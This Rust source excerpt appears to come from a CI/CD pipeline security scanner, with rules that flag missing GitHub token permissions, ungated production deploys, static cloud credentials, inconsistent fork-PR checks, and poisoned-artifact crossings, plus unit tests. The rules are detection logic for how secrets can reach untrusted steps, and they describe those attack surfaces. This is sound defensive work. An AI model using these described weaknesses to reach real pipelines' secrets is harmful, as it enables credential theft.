6094                secret_labels.join(", "),
6095            ),
6096            recommendation: Recommendation::Manual {
6097                action: "Pass the secret to the consuming step via an explicit `env:` mapping on that step (so the relationship is graph-visible) instead of writing it to `$GITHUB_ENV` for ambient pickup. If the consumer is a third-party action, pin it to a 40-char SHA before exposing any secret-derived value to it.".into(),
6098            },
6099            source: FindingSource::BuiltIn,
6100            extras: FindingExtras::default(),
6101        });
6102    }
6103
6104    findings
6105}
6106
6107// ── Positive invariants (negative-space rules) ───────────────────
6108//
6109// These rules fire on the ABSENCE of an expected defensive control rather
6110// than on the presence of a misconfigured one. They are derived from the
6111// blue-team corpus defense report — patterns observed across thousands of
6112// pipelines where the well-defended workflows had a control the others were
6113// missing.
6114//
6115// Each function gates strictly on `META_PLATFORM` so a single pipeline file
6116// is only evaluated by the rules that apply to its source platform.
6117
6118/// Returns true when a graph belongs to the named platform. Falls back to
6119/// false (rule no-ops) when no platform stamp is present — keeps existing
6120/// hand-built test graphs from accidentally tripping platform-scoped rules.
6121fn graph_is_platform(graph: &AuthorityGraph, platform: &str) -> bool {
6122    graph
6123        .metadata
6124        .get(META_PLATFORM)
6125        .map(|p| p == platform)
6126        .unwrap_or(false)
6127}
6128
6129/// Rule: GHA workflow declares no top-level `permissions:` block AND no
6130/// per-job permissions block. With nothing declared, `GITHUB_TOKEN` falls
6131/// back to the broad platform default (`contents: write`, `packages: write`,
6132/// metadata read, etc.) on every trigger. Explicit declarations make the
6133/// blast radius legible to the next reviewer; absence makes it invisible.
6134///
6135/// Detection:
6136///   * `META_PLATFORM == "github-actions"` (gates ADO/GitLab out)
6137///   * Graph carries `META_NO_WORKFLOW_PERMISSIONS == "true"` (parser-set
6138///     when `workflow.permissions` is absent)
6139///   * No Identity node whose name starts with `GITHUB_TOKEN (` (those are
6140///     the per-job override identities the parser creates when a job
6141///     declares its own permissions block)
6142///
6143/// Severity: Medium. Not a direct exploit path on its own but compounds
6144/// every other finding in the same workflow.
6145pub fn no_workflow_level_permissions_block(graph: &AuthorityGraph) -> Vec<Finding> {
6146    if !graph_is_platform(graph, "github-actions") {
6147        return Vec::new();
6148    }
6149    let no_workflow_perms = graph
6150        .metadata
6151        .get(META_NO_WORKFLOW_PERMISSIONS)
6152        .map(|v| v == "true")
6153        .unwrap_or(false);
6154    if !no_workflow_perms {
6155        return Vec::new();
6156    }
6157    // Empty graphs (variable-only YAML files mis-detected as GHA, parse
6158    // failures that left the graph empty, etc.) carry no real authority
6159    // surface to be over-broad over. Skip them. A real workflow always
6160    // produces at least one Step node.
6161    if graph.nodes_of_kind(NodeKind::Step).next().is_none() {
6162        return Vec::new();
6163    }
6164    // Per-job permissions blocks create Identity nodes named
6165    // `GITHUB_TOKEN (<job_name>)`. If any exists, the workflow has at least
6166    // one job-scoped permissions block — don't fire.
6167    let has_job_level_perms = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6168        n.name.starts_with("GITHUB_TOKEN (")
6169            || (n.name == "GITHUB_TOKEN" && n.metadata.contains_key(META_PERMISSIONS))
6170    });
6171    if has_job_level_perms {
6172        return Vec::new();
6173    }
6174    vec![Finding {
6175        severity: Severity::Medium,
6176        category: FindingCategory::NoWorkflowLevelPermissionsBlock,
6177        path: None,
6178        nodes_involved: Vec::new(),
6179        message: "Workflow declares no top-level or per-job `permissions:` block — GITHUB_TOKEN \
6180             falls back to the broad platform default (contents: write, packages: write, …) \
6181             on every trigger. Explicit permissions make the blast radius legible to triage."
6182            .into(),
6183        recommendation: Recommendation::ReducePermissions {
6184            current: "platform default (broad)".into(),
6185            minimum: "permissions: {} at top level, then add the minimum per-job — e.g. \
6186                      `permissions: { contents: read }`"
6187                .into(),
6188        },
6189        source: FindingSource::BuiltIn,
6190        extras: FindingExtras::default(),
6191    }]
6192}
6193
6194/// Rule: ADO job referencing a production-named service connection has no
6195/// `environment:` binding. Strictly broader than
6196/// `terraform_auto_approve_in_prod` — fires on any prod-SC step (Terraform,
6197/// ARM, AzureCLI, AzurePowerShell, custom) whose enclosing job lacks the
6198/// approval gate, regardless of whether `-auto-approve` is set.
6199///
6200/// Detection (per Step):
6201///   * `META_PLATFORM == "azure-devops"`
6202///   * Step carries `META_SERVICE_CONNECTION_NAME` matching prod pattern,
6203///     OR an `Identity` connected via `HasAccessTo` whose name matches
6204///     the same pattern AND carries `META_SERVICE_CONNECTION == "true"`.
6205///   * Step does NOT carry `META_ENV_APPROVAL` (parser tags every step
6206///     inside an environment-bound deployment job).
6207///
6208/// One finding per matching step (matching `terraform_auto_approve_in_prod`
6209/// granularity). Severity: High.
6210pub fn prod_deploy_job_no_environment_gate(graph: &AuthorityGraph) -> Vec<Finding> {
6211    if !graph_is_platform(graph, "azure-devops") {
6212        return Vec::new();
6213    }
6214    let mut findings = Vec::new();
6215    for step in graph.nodes_of_kind(NodeKind::Step) {
6216        let env_gated = step
6217            .metadata
6218            .get(META_ENV_APPROVAL)
6219            .map(|v| v == "true")
6220            .unwrap_or(false);
6221        if env_gated {
6222            continue;
6223        }
6224        let direct = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
6225        let edge_conn = graph
6226            .edges_from(step.id)
6227            .filter(|e| e.kind == EdgeKind::HasAccessTo)
6228            .filter_map(|e| graph.node(e.to))
6229            .find(|n| {
6230                n.kind == NodeKind::Identity
6231                    && n.metadata
6232                        .get(META_SERVICE_CONNECTION)
6233                        .map(|v| v == "true")
6234                        .unwrap_or(false)
6235            })
6236            .map(|n| n.name.clone());
6237        let conn_name = match direct.or(edge_conn) {
6238            Some(n) if looks_like_prod_connection(&n) => n,
6239            _ => continue,
6240        };
6241        findings.push(Finding {
6242            severity: Severity::High,
6243            category: FindingCategory::ProdDeployJobNoEnvironmentGate,
6244            path: None,
6245            nodes_involved: vec![step.id],
6246            message: format!(
6247                "Step '{}' targets production service connection '{}' but its job has no \
6248                 `environment:` binding — every pipeline trigger applies changes with no \
6249                 approval queue and no entry in the ADO Environments audit trail",
6250                step.name, conn_name
6251            ),
6252            recommendation: Recommendation::Manual {
6253                action: "Move the step into a deployment job whose `environment:` is configured \
6254                         with required approvers in ADO. Even if `-auto-approve` is acceptable \
6255                         (e.g. `terraform apply tfplan`), the environment binding gives the \
6256                         platform a chokepoint for approvals, audit, and concurrency limits."
6257                    .into(),
6258            },
6259            source: FindingSource::BuiltIn,
6260            extras: FindingExtras::default(),
6261        });
6262    }
6263    findings
6264}
6265
6266/// Rule: long-lived static credential in scope but the graph has no OIDC
6267/// identity. Advisory uplift on top of `long_lived_credential` that wires
6268/// the existing `Recommendation::FederateIdentity` variant — emits one Info
6269/// finding per static credential whose name suggests a cloud provider that
6270/// supports OIDC (AWS / GCP / Azure).
6271///
6272/// Heuristic: AWS / GCP / Azure tokens usually carry the provider name in
6273/// the variable identifier (`AWS_*`, `GCP_*`, `GCLOUD_*`, `GOOGLE_*`,
6274/// `AZURE_*`, `ARM_*`). When such a name appears AND no OIDC identity
6275/// exists in the graph, the migration to federation is the actionable
6276/// remediation. The recommendation enum has carried `FederateIdentity` for
6277/// two releases without any rule emitting it.
6278///
6279/// Severity: Info (advisory). The underlying credential is already flagged
6280/// at higher severity by `long_lived_credential`.
6281pub fn long_lived_secret_without_oidc_recommendation(graph: &AuthorityGraph) -> Vec<Finding> {
6282    // Skip if any OIDC identity already exists — the workflow is already on
6283    // a federated path; the static credential it carries is presumably a
6284    // legacy artifact unrelated to the OIDC integration.
6285    let has_oidc = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6286        n.metadata
6287            .get(META_OIDC)
6288            .map(|v| v == "true")
6289            .unwrap_or(false)
6290    });
6291    if has_oidc {
6292        return Vec::new();
6293    }
6294    let mut findings = Vec::new();
6295    for secret in graph.nodes_of_kind(NodeKind::Secret) {
6296        let upper = secret.name.to_uppercase();
6297        let provider: Option<(&str, &str)> = if upper.starts_with("AWS_")
6298            || upper.contains("AWS_ACCESS_KEY")
6299            || upper.contains("AWS_SECRET")
6300        {
6301            Some(("AWS", "GitHub Actions OIDC + sts:AssumeRoleWithWebIdentity (id-token: write + aws-actions/configure-aws-credentials)"))
6302        } else if upper.starts_with("GCP_")
6303            || upper.starts_with("GCLOUD_")
6304            || upper.starts_with("GOOGLE_")
6305            || upper.contains("GCP_SERVICE_ACCOUNT")
6306            || upper.contains("GOOGLE_CREDENTIALS")
6307        {
6308            Some(("GCP", "GCP Workload Identity Federation (google-github-actions/auth with workload_identity_provider)"))
6309        } else if upper.starts_with("AZURE_")
6310            || upper.starts_with("ARM_")
6311            || upper.contains("AZURE_CLIENT_SECRET")
6312        {
6313            Some((
6314                "Azure",
6315                "Azure federated credential (azure/login with client-id, no client-secret)",
6316            ))
6317        } else {
6318            None
6319        };
6320        let Some((cloud, oidc_provider)) = provider else {
6321            continue;
6322        };
6323        findings.push(Finding {
6324            severity: Severity::Info,
6325            category: FindingCategory::LongLivedSecretWithoutOidcRecommendation,
6326            path: None,
6327            nodes_involved: vec![secret.id],
6328            message: format!(
6329                "Long-lived {cloud} credential '{}' is in scope and no OIDC identity exists \
6330                 in this workflow — {cloud} supports OIDC federation, so this credential could \
6331                 be replaced with a short-lived token issued at runtime",
6332                secret.name
6333            ),
6334            recommendation: Recommendation::FederateIdentity {
6335                static_secret: secret.name.clone(),
6336                oidc_provider: oidc_provider.into(),
6337            },
6338            source: FindingSource::BuiltIn,
6339            extras: FindingExtras::default(),
6340        });
6341    }
6342    findings
6343}
6344
6345/// Rule: GHA workflow with multiple privileged jobs where SOME steps carry
6346/// the standard fork-check `if:` and OTHERS do not — intra-file
6347/// inconsistency in defensive posture. The org has the right instinct
6348/// (some jobs are guarded) but applied it unevenly. Surfaces the unguarded
6349/// privileged jobs by name so a reviewer can fix the gap in one PR.
6350///
6351/// Detection:
6352///   * `META_PLATFORM == "github-actions"`
6353///   * Trigger contains `pull_request` or `pull_request_target`
6354///   * Multiple jobs hold authority (steps with `HasAccessTo` to a Secret
6355///     or Identity)
6356///   * At least one such job's privileged steps ALL carry
6357///     `META_FORK_CHECK == "true"`
6358///   * AND at least one OTHER privileged job has NO step carrying that
6359///     marker
6360///
6361/// Severity: High. Severity floors at Medium when the inconsistency is
6362/// limited to a single unguarded job (one-off oversight) vs. multiple
6363/// (systemic gap).
6364pub fn pull_request_workflow_inconsistent_fork_check(graph: &AuthorityGraph) -> Vec<Finding> {
6365    if !graph_is_platform(graph, "github-actions") {
6366        return Vec::new();
6367    }
6368    let trigger = match graph.metadata.get(META_TRIGGER) {
6369        Some(t) => t.as_str(),
6370        None => return Vec::new(),
6371    };
6372    let in_pr_context = trigger.split(',').any(|t| {
6373        let t = t.trim();
6374        matches!(t, "pull_request" | "pull_request_target")
6375    });
6376    if !in_pr_context {
6377        return Vec::new();
6378    }
6379
6380    // For each privileged step, record (job_name, has_fork_check). A job is
6381    // "guarded" iff every privileged step in it carries the marker.
6382    use std::collections::BTreeMap;
6383    let mut per_job: BTreeMap<String, (bool, bool)> = BTreeMap::new(); // job -> (any_guarded, any_unguarded)
6384
6385    for step in graph.nodes_of_kind(NodeKind::Step) {
6386        let holds_authority = graph.edges_from(step.id).any(|e| {
6387            e.kind == EdgeKind::HasAccessTo
6388                && graph
6389                    .node(e.to)
6390                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6391                    .unwrap_or(false)
6392        });
6393        if !holds_authority {
6394            continue;
6395        }
6396        let job = step
6397            .metadata
6398            .get(META_JOB_NAME)
6399            .cloned()
6400            .unwrap_or_else(|| step.name.clone());
6401        let guarded = step
6402            .metadata
6403            .get(META_FORK_CHECK)
6404            .map(|v| v == "true")
6405            .unwrap_or(false);
6406        let entry = per_job.entry(job).or_insert((false, false));
6407        if guarded {
6408            entry.0 = true;
6409        } else {
6410            entry.1 = true;
6411        }
6412    }
6413
6414    // Need >= 2 distinct privileged jobs; >= 1 fully-guarded job and >= 1
6415    // job with at least one unguarded privileged step.
6416    if per_job.len() < 2 {
6417        return Vec::new();
6418    }
6419    let fully_guarded: Vec<&String> = per_job
6420        .iter()
6421        .filter(|(_, (g, u))| *g && !*u)
6422        .map(|(k, _)| k)
6423        .collect();
6424    let unguarded: Vec<&String> = per_job
6425        .iter()
6426        .filter(|(_, (_, u))| *u)
6427        .map(|(k, _)| k)
6428        .collect();
6429    if fully_guarded.is_empty() || unguarded.is_empty() {
6430        return Vec::new();
6431    }
6432    let severity = if unguarded.len() >= 2 {
6433        Severity::High
6434    } else {
6435        Severity::Medium
6436    };
6437    let guarded_label = fully_guarded
6438        .iter()
6439        .map(|s| s.as_str())
6440        .collect::<Vec<_>>()
6441        .join(", ");
6442    let unguarded_label = unguarded
6443        .iter()
6444        .map(|s| s.as_str())
6445        .collect::<Vec<_>>()
6446        .join(", ");
6447    vec![Finding {
6448        severity,
6449        category: FindingCategory::PullRequestWorkflowInconsistentForkCheck,
6450        path: None,
6451        nodes_involved: Vec::new(),
6452        message: format!(
6453            "PR-triggered workflow ('{trigger}') applies the standard fork-check \
6454             (`github.event.pull_request.head.repo.fork == false` or equivalent) on \
6455             privileged jobs [{guarded_label}] but NOT on [{unguarded_label}] — the \
6456             unguarded jobs hold authority that fork PRs can reach"
6457        ),
6458        recommendation: Recommendation::Manual {
6459            action: format!(
6460                "Add `if: github.event.pull_request.head.repo.fork == false` (or \
6461                 `github.event.pull_request.head.repo.full_name == github.repository`) to the \
6462                 privileged steps in [{unguarded_label}]. Match the pattern already used by \
6463                 [{guarded_label}] in the same workflow."
6464            ),
6465        },
6466        source: FindingSource::BuiltIn,
6467        extras: FindingExtras::default(),
6468    }]
6469}
6470
6471/// Rule: GitLab job with a production-named `environment:` binding has no
6472/// `rules:` / `only:` clause restricting it to protected branches. The job
6473/// runs (or attempts to run) on every pipeline trigger; if branch
6474/// protection is later relaxed the deploy becomes runnable from
6475/// unprotected branches without any code change.
6476///
6477/// Detection (per Step in a GitLab graph):
6478///   * `META_PLATFORM == "gitlab"`
6479///   * Step carries `environment_name` matching a production token
6480///     (`prod`, `production`, `prd`)
6481///   * Step does NOT carry `META_RULES_PROTECTED_ONLY`
6482///
6483/// Severity: Medium.
6484pub fn gitlab_deploy_job_missing_protected_branch_only(graph: &AuthorityGraph) -> Vec<Finding> {
6485    if !graph_is_platform(graph, "gitlab") {
6486        return Vec::new();
6487    }
6488    let mut findings = Vec::new();
6489    for step in graph.nodes_of_kind(NodeKind::Step) {
6490        let env_name = match step.metadata.get("environment_name") {
6491            Some(n) => n.clone(),
6492            None => continue,
6493        };
6494        if !looks_like_prod_connection(&env_name) {
6495            continue;
6496        }
6497        let protected = step
6498            .metadata
6499            .get(META_RULES_PROTECTED_ONLY)
6500            .map(|v| v == "true")
6501            .unwrap_or(false);
6502        if protected {
6503            continue;
6504        }
6505        findings.push(Finding {
6506            severity: Severity::Medium,
6507            category: FindingCategory::GitlabDeployJobMissingProtectedBranchOnly,
6508            path: None,
6509            nodes_involved: vec![step.id],
6510            message: format!(
6511                "GitLab deploy job '{}' targets production environment '{}' but has no \
6512                 `rules:` / `only:` clause restricting it to protected branches — every MR \
6513                 and every push will attempt to run the deploy",
6514                step.name, env_name
6515            ),
6516            recommendation: Recommendation::Manual {
6517                action: "Add `rules: - if: '$CI_COMMIT_REF_PROTECTED == \"true\"'` to the job, \
6518                         or `only: [main]` for the simplest case. This survives future \
6519                         changes to branch-protection settings."
6520                    .into(),
6521            },
6522            source: FindingSource::BuiltIn,
6523            extras: FindingExtras::default(),
6524        });
6525    }
6526    findings
6527}
6528
6529// ── Compensating-control suppressions ────────────────────────
6530//
6531// These suppressions DOWNGRADE or REMOVE existing-rule findings when the
6532// graph carries a control that neutralises (or substantially mitigates)
6533// the underlying risk. Applied as a post-processing pass so each
6534// suppression can see both the finding and the surrounding graph state.
6535//
6536// Design intent (from the blue-team corpus defense report):
6537//   * downgrade > suppress: keep the finding visible at a lower severity
6538//     so it still surfaces in audits, but stop competing for triage time
6539//     with un-mitigated criticals
6540//   * never *delete* a finding silently — every suppression appends an
6541//     explanation suffix to the message describing the compensating
6542//     control taudit credited
6543//
6544// Suppressions implemented here:
6545//   1. `checkout_self_pr_exposure` downgraded when the same job has no
6546//      privileged steps (no Secret/Identity access and no env-gate writes).
6547//   2. `trigger_context_mismatch` downgraded when every privileged step
6548//      in the workflow carries the standard fork-check `if:`.
6549//   3. `over_privileged_identity` suppressed when the workflow-level
6550//      identity is broad but at least one job-level override narrows the
6551//      scope (job-level wins at runtime).
6552//   4. `terraform_auto_approve_in_prod` downgraded — not skipped — when an
6553//      `environment:` gate is present (replaces the previous early-skip
6554//      which discarded the finding entirely).
6555fn apply_compensating_controls(graph: &AuthorityGraph, findings: &mut [Finding]) {
6556    // Pre-compute graph-level signals once so the per-finding loop stays
6557    // O(N findings) rather than O(N findings × M nodes).
6558    let mut all_authority_steps_have_fork_check = true;
6559    let mut any_authority_step_seen = false;
6560    for step in graph.nodes_of_kind(NodeKind::Step) {
6561        let holds_authority = graph.edges_from(step.id).any(|e| {
6562            e.kind == EdgeKind::HasAccessTo
6563                && graph
6564                    .node(e.to)
6565                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6566                    .unwrap_or(false)
6567        });
6568        if !holds_authority {
6569            continue;
6570        }
6571        any_authority_step_seen = true;
6572        let guarded = step
6573            .metadata
6574            .get(META_FORK_CHECK)
6575            .map(|v| v == "true")
6576            .unwrap_or(false);
6577        if !guarded {
6578            all_authority_steps_have_fork_check = false;
6579        }
6580    }
6581    let fork_check_universal = any_authority_step_seen && all_authority_steps_have_fork_check;
6582
6583    // For Suppression 1, build per-job: does any step in the job have
6584    // access to a Secret/Identity OR write to the env gate?
6585    use std::collections::{BTreeMap, BTreeSet};
6586    let mut job_has_privileged_step: BTreeMap<String, bool> = BTreeMap::new();
6587    for step in graph.nodes_of_kind(NodeKind::Step) {
6588        let job = match step.metadata.get(META_JOB_NAME) {
6589            Some(j) => j.clone(),
6590            None => continue,
6591        };
6592        let privileged = graph.edges_from(step.id).any(|e| {
6593            e.kind == EdgeKind::HasAccessTo
6594                && graph
6595                    .node(e.to)
6596                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6597                    .unwrap_or(false)
6598        }) || step
6599            .metadata
6600            .get(META_WRITES_ENV_GATE)
6601            .map(|v| v == "true")
6602            .unwrap_or(false);
6603        let entry = job_has_privileged_step.entry(job).or_insert(false);
6604        if privileged {
6605            *entry = true;
6606        }
6607    }
6608
6609    // For Suppression 3 — over_privileged_identity — collect the names of
6610    // narrower per-job identity overrides so we can credit them when the
6611    // broad workflow-level identity fires.
6612    let job_level_narrow_overrides: BTreeSet<String> = graph
6613        .nodes_of_kind(NodeKind::Identity)
6614        .filter(|n| {
6615            n.name.starts_with("GITHUB_TOKEN (")
6616                && n.metadata
6617                    .get(META_IDENTITY_SCOPE)
6618                    .map(|s| s == "constrained")
6619                    .unwrap_or(false)
6620        })
6621        .map(|n| n.name.clone())
6622        .collect();
6623
6624    for finding in findings.iter_mut() {
6625        match finding.category {
6626            // ── Suppression 1: checkout_self_pr_exposure
6627            FindingCategory::CheckoutSelfPrExposure => {
6628                // Identify the checkout step (first node in nodes_involved)
6629                // and look up its job. If the job has no privileged steps,
6630                // the checkout is read-only — downgrade to Info.
6631                let job = finding
6632                    .nodes_involved
6633                    .first()
6634                    .and_then(|id| graph.node(*id))
6635                    .and_then(|n| n.metadata.get(META_JOB_NAME).cloned());
6636                let job_privileged = job
6637                    .as_ref()
6638                    .and_then(|j| job_has_privileged_step.get(j).copied())
6639                    .unwrap_or(true); // unknown → conservative: keep High
6640                if !job_privileged {
6641                    finding.severity = Severity::Info;
6642                    finding.message.push_str(
6643                        " (downgraded: no privileged steps in same job — \
6644                                   checkout is read-only for lint/test/analysis)",
6645                    );
6646                }
6647            }
6648            // ── Suppression 2: trigger_context_mismatch
6649            FindingCategory::TriggerContextMismatch => {
6650                if fork_check_universal {
6651                    // Critical → Medium (not Info — the trigger choice itself
6652                    // is still risky enough to keep visible for audit).
6653                    finding.severity = match finding.severity {
6654                        Severity::Critical => Severity::Medium,
6655                        s => downgrade_one_step(s),
6656                    };
6657                    finding.message.push_str(
6658                        " (downgraded: every privileged job in this workflow carries the \
6659                         standard fork-check `if:` — fork PRs cannot reach the privileged steps)",
6660                    );
6661                }
6662            }
6663            // ── Suppression 3: over_privileged_identity
6664            FindingCategory::OverPrivilegedIdentity => {
6665                // Only relevant when the firing identity IS the
6666                // workflow-level GITHUB_TOKEN AND at least one job has its
6667                // own narrower override.
6668                let firing_node_name = finding
6669                    .nodes_involved
6670                    .first()
6671                    .and_then(|id| graph.node(*id))
6672                    .map(|n| n.name.clone());
6673                let is_workflow_level_token = firing_node_name.as_deref() == Some("GITHUB_TOKEN");
6674                if is_workflow_level_token && !job_level_narrow_overrides.is_empty() {
6675                    // Suppress by reducing to Info — the runtime identity
6676                    // any job actually uses is the narrower job-level one.
6677                    finding.severity = Severity::Info;
6678                    let mut narrower: Vec<&str> = job_level_narrow_overrides
6679                        .iter()
6680                        .map(|s| s.as_str())
6681                        .collect();
6682                    narrower.sort_unstable();
6683                    finding.message.push_str(&format!(
6684                        " (suppressed: job-level permissions narrow this scope at runtime — \
6685                         see {})",
6686                        narrower.join(", ")
6687                    ));
6688                }
6689            }
6690            // ── Suppression 4: terraform_auto_approve_in_prod
6691            //
6692            // The pre-existing rule already early-skipped
6693            // env-gated steps, so it never emits a finding to downgrade.
6694            // Downgrade is wired into the rule body itself (search for
6695            // `env_gated`) — kept as a no-op match arm here so future
6696            // contributors can find the suppression-pass alongside the
6697            // others.
6698            FindingCategory::TerraformAutoApproveInProd => { /* see rule body */ }
6699            _ => {}
6700        }
6701    }
6702}
6703
6704#[cfg(test)]
6705mod tests {
6706    use super::*;
6707    use crate::graph::*;
6708
6709    fn source(file: &str) -> PipelineSource {
6710        PipelineSource {
6711            file: file.into(),
6712            repo: None,
6713            git_ref: None,
6714            commit_sha: None,
6715        }
6716    }
6717
6718    #[test]
6719    fn unpinned_third_party_action_flagged() {
6720        let mut g = AuthorityGraph::new(source("ci.yml"));
6721        g.add_node(
6722            NodeKind::Image,
6723            "actions/checkout@v4",
6724            TrustZone::ThirdParty,
6725        );
6726
6727        let findings = unpinned_action(&g);
6728        assert_eq!(findings.len(), 1);
6729        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
6730    }
6731
6732    #[test]
6733    fn pinned_action_not_flagged() {
6734        let mut g = AuthorityGraph::new(source("ci.yml"));
6735        g.add_node(
6736            NodeKind::Image,
6737            "actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
6738            TrustZone::ThirdParty,
6739        );
6740
6741        let findings = unpinned_action(&g);
6742        assert!(findings.is_empty());
6743    }
6744
6745    #[test]
6746    fn untrusted_step_with_secret_is_critical() {
6747        let mut g = AuthorityGraph::new(source("ci.yml"));
6748        let step = g.add_node(NodeKind::Step, "evil-action", TrustZone::Untrusted);
6749        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
6750        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6751
6752        let findings = untrusted_with_authority(&g);
6753        assert_eq!(findings.len(), 1);
6754        assert_eq!(findings[0].severity, Severity::Critical);
6755    }
6756
6757    #[test]
6758    fn implicit_identity_downgrades_to_info() {
6759        let mut g = AuthorityGraph::new(source("ci.yml"));
6760        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6761        let mut meta = std::collections::HashMap::new();
6762        meta.insert(META_IMPLICIT.into(), "true".into());
6763        meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
6764        let token = g.add_node_with_metadata(
6765            NodeKind::Identity,
6766            "System.AccessToken",
6767            TrustZone::FirstParty,
6768            meta,
6769        );
6770        g.add_edge(step, token, EdgeKind::HasAccessTo);
6771
6772        let findings = untrusted_with_authority(&g);
6773        assert_eq!(findings.len(), 1);
6774        assert_eq!(
6775            findings[0].severity,
6776            Severity::Info,
6777            "implicit token must be Info not Critical"
6778        );
6779        assert!(findings[0].message.contains("platform-injected"));
6780    }
6781
6782    #[test]
6783    fn explicit_secret_remains_critical_despite_implicit_token() {
6784        let mut g = AuthorityGraph::new(source("ci.yml"));
6785        let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
6786        // implicit token → Info
6787        let mut meta = std::collections::HashMap::new();
6788        meta.insert(META_IMPLICIT.into(), "true".into());
6789        let token = g.add_node_with_metadata(
6790            NodeKind::Identity,
6791            "System.AccessToken",
6792            TrustZone::FirstParty,
6793            meta,
6794        );
6795        // explicit secret → Critical
6796        let secret = g.add_node(NodeKind::Secret, "ARM_CLIENT_SECRET", TrustZone::FirstParty);
6797        g.add_edge(step, token, EdgeKind::HasAccessTo);
6798        g.add_edge(step, secret, EdgeKind::HasAccessTo);
6799
6800        let findings = untrusted_with_authority(&g);
6801        assert_eq!(findings.len(), 2);
6802        let info = findings
6803            .iter()
6804            .find(|f| f.severity == Severity::Info)
6805            .unwrap();
6806        let crit = findings
6807            .iter()
6808            .find(|f| f.severity == Severity::Critical)
6809            .unwrap();
6810        assert!(info.message.contains("platform-injected"));
6811        assert!(crit.message.contains("ARM_CLIENT_SECRET"));
6812    }
6813
6814    #[test]
6815    fn artifact_crossing_untrusted_producer_firstparty_consumer_fires() {
6816        // Untrusted producer -> first-party consumer: should fire (poisoned artifact attack)
6817        let mut g = AuthorityGraph::new(source("ci.yml"));
6818        let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::Untrusted);
6819        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6820        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6821        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6822
6823        g.add_edge(build, secret, EdgeKind::HasAccessTo);
6824        g.add_edge(build, artifact, EdgeKind::Produces);
6825        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6826
6827        let findings = artifact_boundary_crossing(&g);
6828        assert_eq!(findings.len(), 1);
6829        assert_eq!(
6830            findings[0].category,
6831            FindingCategory::ArtifactBoundaryCrossing
6832        );
6833    }
6834
6835    #[test]
6836    fn artifact_crossing_no_authority_still_fires() {
6837        // The crossing itself is the risk; no HasAccessTo edge required to fire.
6838        let mut g = AuthorityGraph::new(source("ci.yml"));
6839        let build = g.add_node(NodeKind::Step, "pr-build", TrustZone::Untrusted);
6840        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6841        let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
6842        // No HasAccessTo edge on the producer — previously this caused the rule to skip.
6843        g.add_edge(build, artifact, EdgeKind::Produces);
6844        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6845        let findings = artifact_boundary_crossing(&g);
6846        assert_eq!(
6847            findings.len(),
6848            1,
6849            "boundary crossing must fire without a producer HasAccessTo edge; got: {findings:#?}"
6850        );
6851        assert_eq!(
6852            findings[0].category,
6853            FindingCategory::ArtifactBoundaryCrossing
6854        );
6855    }
6856
6857    // ── Bug regression: run_all_rules dedup ─────────────────────────────────
6858
6859    #[test]
6860    fn run_all_rules_deduplicates_structurally_identical_findings() {
6861        // Regression for Bug 3: BFS can visit the same (step, secret) pair via
6862        // two distinct graph paths. Both visits produce a finding with identical
6863        // category + nodes_involved + message. run_all_rules must emit exactly
6864        // one copy regardless of path count.
6865        let mut g = AuthorityGraph::new(source("ci.yml"));
6866        g.metadata
6867            .insert(META_PLATFORM.into(), "azure-devops".into());
6868        let secret = g.add_node(NodeKind::Secret, "MY_SECRET", TrustZone::FirstParty);
6869        let intermediate = g.add_node(NodeKind::Step, "middle-step", TrustZone::FirstParty);
6870        let sink = g.add_node(NodeKind::Step, "sink-step", TrustZone::Untrusted);
6871
6872        // Two paths from secret → sink: direct and via intermediate.
6873        g.add_edge(sink, secret, EdgeKind::HasAccessTo);
6874        g.add_edge(intermediate, secret, EdgeKind::HasAccessTo);
6875        g.add_edge(sink, intermediate, EdgeKind::HasAccessTo);
6876
6877        let findings = run_all_rules(&g, 4);
6878
6879        // Count findings whose nodes_involved contain the sink step.
6880        let sink_findings: Vec<_> = findings
6881            .iter()
6882            .filter(|f| f.nodes_involved.contains(&sink))
6883            .filter(|f| f.nodes_involved.contains(&secret))
6884            .collect();
6885
6886        // Regardless of path count through the graph, each unique
6887        // (category, nodes, message) triple must appear at most once.
6888        let unique_messages: std::collections::HashSet<_> =
6889            sink_findings.iter().map(|f| &f.message).collect();
6890        assert_eq!(
6891            sink_findings.len(),
6892            unique_messages.len(),
6893            "duplicate findings must be deduplicated; got: {findings:#?}"
6894        );
6895    }
6896
6897    #[test]
6898    fn artifact_crossing_same_job_does_not_fire() {
6899        // Upload and download in the same job is a legitimate temp-file pattern.
6900        // META_JOB_NAME guard must suppress the finding.
6901        let mut g = AuthorityGraph::new(source("ci.yml"));
6902        let build = g.add_node_with_metadata(
6903            NodeKind::Step,
6904            "pr-build",
6905            TrustZone::Untrusted,
6906            [(META_JOB_NAME.to_string(), "build".to_string())].into(),
6907        );
6908        let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::Untrusted);
6909        let deploy = g.add_node_with_metadata(
6910            NodeKind::Step,
6911            "deploy",
6912            TrustZone::FirstParty,
6913            [
6914                (META_JOB_NAME.to_string(), "build".to_string()), // SAME job
6915            ]
6916            .into(),
6917        );
6918        g.add_edge(build, artifact, EdgeKind::Produces);
6919        g.add_edge(artifact, deploy, EdgeKind::Consumes);
6920        let findings = artifact_boundary_crossing(&g);
6921        assert_eq!(
6922            findings.len(),
6923            0,
6924            "intra-job upload→download must not fire; got: {findings:#?}"
6925        );
6926    }
6927
